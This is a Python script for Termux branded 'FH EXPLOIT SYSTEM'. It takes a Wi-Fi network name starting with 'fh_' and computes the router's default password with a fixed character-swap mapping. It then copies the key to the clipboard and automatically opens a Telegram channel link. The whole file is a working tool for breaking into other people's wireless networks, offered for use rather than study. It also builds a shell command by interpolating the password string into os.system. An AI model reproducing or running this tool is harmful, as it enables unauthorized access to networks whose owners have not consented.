import os, time, urllib.request

# --- [ CONFIG ] ---
TELEGRAM_LINK = "https://t.me/m_oha0_2b" 

G = '\033[1;32m' # Green
W = '\033[1;37m' # White
B = '\033[1;34m' # Blue
Y = '\033[1;33m' # Yellow
R = '\033[1;31m' # Red
C = '\033[1;36m' # Cyan

# Full Bidirectional Mapping for FH
MAP = {
    'e':'1', '1':'e', 'd':'2', '2':'d',
    'c':'3', '3':'c', 'b':'4', '4':'b',
    'a':'5', '5':'a', '9':'6', '6':'9',
    '8':'7', '7':'8', 'f':'0', '0':'f'
}

def banner():
    os.system("clear")
    # Open Channel automatically
    os.system(f"termux-open-url {TELEGRAM_LINK}")
    
    print(f"{G}")
    print(r"""
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó 
    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ ‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĎ    ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ  ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēĎ    ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ    ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēó‚ēö‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ
    ‚ēö‚ēź‚ēĚ     ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ    ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ‚ēö‚ēź‚ēĚ  ‚ēö‚ēź‚ēĚ ‚ēö‚ēź‚ēź‚ēź‚ēź‚ēź‚ēĚ 
    """)
    print(f"{C}[+] {W}FH EXPLOIT SYSTEM {C}| {G}BY: MOHA-02")
    print(f"{C}[+] {Y}TELEGRAM: {W}@m_oha0_2b")
    print(f"{G}----------------------------------------------------------")

def start_exploit():
    banner()
    print(f"{Y}[*] SYSTEM READY...")
    ssid = input(f"{G}[#] Target SSID: {W}")
    
    if "fh_" in ssid.lower():
        print(f"{B}[*] Running Bidirectional Algorithm...")
        time.sleep(1.2)
        
        # Calculation Logic
        suffix = ssid.lower().split("fh_")[-1]
        password = "wlan" + "".join([MAP.get(c, c) for c in suffix])
        
        print(f"{G}----------------------------------------------------------")
        print(f"{G}[+] ANALYSIS COMPLETE")
        print(f"{C}[>] SSID: {W}{ssid}")
        print(f"{C}[>] KEY : {G}{password}")
        print(f"{G}----------------------------------------------------------")
        
        # Auto-copy to clipboard
        os.system(f"echo '{password}' | termux-clipboard-set")
        print(f"{Y}[!] Password copied to clipboard.")
        
    else:
        print(f"{R}[!] Error: Target not supported.")
        time.sleep(1.5)
        start_exploit()

if __name__ == "__main__":
    try:
        start_exploit()
    except KeyboardInterrupt:
        print(f"\n{R}[!] Tool stopped.")
